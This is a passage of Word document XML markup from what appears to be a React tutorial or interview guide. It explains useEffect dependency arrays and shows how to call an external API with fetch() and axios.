    <w:p w14:paraId="4545101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0586DAD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ount}, Name: ${name}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2186EC9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name]);  // Runs whenever 'count' or 'name' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502FE97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example above, the effect will re-run whenever either count or name changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591CA7C3"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3B5CD7C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dependency array []</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect only once (on mount).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CDE0E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pendencies [dep1, dep2, ...]</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect whenever any of the dependencies change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38E27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array</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Runs the effect after every render.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D53E6A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rrectly using the dependency array ensures that your effects behave as expected, avoiding unnecessary re-renders or missing updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F310AA3" w14:textId="1B69D7D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3834" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86F985" w14:textId="0E4B1582" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="004A258C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="941" w:name="_Toc197868155"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use and significance of dependency arrays</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="941"/>
    </w:p>
    <w:p w14:paraId="71EDFF9F" w14:textId="633D573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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Key Uses and Significance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A83C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ing Performance</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out a dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The effect will run on every render, which might be inefficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB076C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 a dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The effect will only run when a specific value in the array changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC91F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nsuring Correct Behavior</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React’s useEffect hook can be used for various side effects like fetching data, manipulating the DOM, or subscribing to external services. The dependency array ensures that side effects happen </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only when they’re relevant</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B964D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 if you’re fetching data from an API based on the value of a prop or state, you want the effect to run only when that prop or state changes. The dependency array ensures this behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305E05D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2211CC83" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FDF902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5EAA55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changed: ${count}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479288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Perform some side effect based on count</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B98BD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Runs only when 'count' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9A96B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ing Stale Closure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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB630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5B1205E3" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D78BE3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7C261B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timer = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF1175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 This might use an outdated 'count' value without proper dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2819F07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1000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062B39D0" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43558A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 =&gt; clearInterval(timer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B2E59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Ensures 'count' is updated and the correct value is used in the interval</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F0C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trolling Effect Frequency</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2F763F"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mpty dependency array []</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect runs only </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>once</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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Array with dependencies [dep1, dep2, ...]</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect runs when </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>any value in the array changes</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it ideal for handling side effects that depend on specific state or props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C46C0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dependency array</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The effect will run </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>after every render</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can lead to excessive side effects and performance issues, but might be necessary for some cases like directly manipulating the DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14720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The dependency array allows for </w:t>
      </w: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2B8634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isLoggedIn) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568CE9B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Fetch user data only when user is logged in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EF92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UserData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC23AB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953310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isLoggedIn]);  // Runs only when 'isLoggedIn' changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478DD73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implifying Code and Preventing Unintended Side Effect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 of Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FDAF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fficient Side Effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Run side effects only when necessary (based on dependencies).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EF924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ed Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prevent unnecessary re-renders or API calls by triggering effects only when specific dependencies change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCBFE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 Stale Data</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensure the effect always uses fresh state and props.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DCD7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Predictable Behavior</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Helps in controlling when and why the effect runs, making the app's behavior more predictable and manageable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38305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Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A272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nclude all variables (props, state, functions) used inside useEffect that are defined outside of it in the dependency array to avoid stale closures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140172F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want the effect to run only once, use an empty array [].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A46E2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don't need to track dependencies, avoid omitting the dependency array altogether, as it can lead to unnecessary re-renders.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771ED009" w14:textId="0B23231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3835" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E239192" w14:textId="304AB434" w:rsidR="002B263A" w:rsidRPr="00CE4B95" w:rsidRDefault="00D57367">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="942" w:name="_Toc197868156"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to make a call to an external API from ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="002B263A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="942"/>
    </w:p>
    <w:p w14:paraId="6846B6BD" w14:textId="5E000DE6" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5"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o make a call to an external API from ReactJS, you can use various methods, but the most common and efficient approach is to use fetch() or libraries like axios. Below, I'll explain both methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDD5D9A"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Using fetch()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765CE1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he fetch() API is built into modern browsers and provides a simple way to make network requests. It returns a Promise and is used for making HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6438059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fetch():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A73C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6177720D" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E5F4CB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690FDDB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20B923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7996886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1EFCCF7C" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B094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084569E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69FC72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https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BB995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7BF6BD1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response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C088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row new Error('Network response was not ok');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C462C6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B215F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response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A51F38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4F935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then((data) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677CA7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data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3436802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9DE73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5F7D1A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1F332C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094B216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24D06D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00D51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19EB8132" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AC81F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6A678C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21753DD2" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D16C5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62372C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79A51A5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4DEFB3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7FBE60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457691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0C66A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06E07436" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD6E14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2D8E5530"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4866E2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Effect</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to fetch data when the component mounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1EC1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Makes a GET request to the provided API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF231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json()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Parses the response as JSON.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225577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43E373E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Uses .catch() to handle errors if the request fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E26E57"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0C158">
          <v:rect id="_x0000_i3836" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AFB808"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Using axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3433B5C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 is a popular library for making HTTP requests. It simplifies handling requests and responses and automatically transforms JSON data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0F62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First, install axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717FD06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axios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A7C3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axios:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B6B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73C1FF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axios from 'axios';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746E57F1" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4830AB9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0E32AC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49152C8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4C59E5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2FC90A86" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EA5938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41190A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78C0C1E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xios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DC7E5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get('https://api.example.com/data')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E6750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1224E0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response.data); // Access the response data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC13B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F1118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DDBC7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3393D0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48B7B8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4B32FA4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DB7CD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0F4A2C8E" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9BF37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18D7F8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306C7DB0" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D1E852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26E8110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2FE2E34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2E3721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1408F5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36BB8F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47120A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2FF201B" w14:textId="77777777" w:rsidR="008362E5" w:rsidRPr="00EC456B" w:rsidRDefault="008362E5" w:rsidP="00EC456B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="607F796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1562780F"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7DA49E0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get()</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Makes a GET request to the provided API endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4F76C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data</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC456B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Accesses the actual data from the response object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168D142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3D4ADDC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Handles any errors in the .catch() block.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C062B"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623E2">
          <v:rect id="_x0000_i3837" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF593C3"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Making POST Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B32684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need to send data to an API (e.g., for form submissions), you can make a POST request using both fetch() and axios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D7F7E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fetch() (POST request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634D95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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327ADCF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method: 'POST',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7B7A2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headers: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5209C0C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tent-Type': 'application/json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B36266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476C248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body: JSON.stringify({ name: 'John', age: 30 }),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1D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9CBC0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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389EB3C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B63C1E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7D12378B"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axios (POST request):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE9C9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D203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post('https://api.example.com/data', {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D7B6E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name: 'John',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069013D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ge: 30,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055A57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0B9FDA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data))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A44E2B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0FB92673"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B89EB">
          <v:rect id="_x0000_i3838" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04B93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4941FF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Native JavaScript function for making HTTP requests. It requires manual handling of response parsing and error handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EACB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A popular library that provides a simpler API for HTTP requests and automatically handles response parsing and error handling.</w:t>
      </w:r>
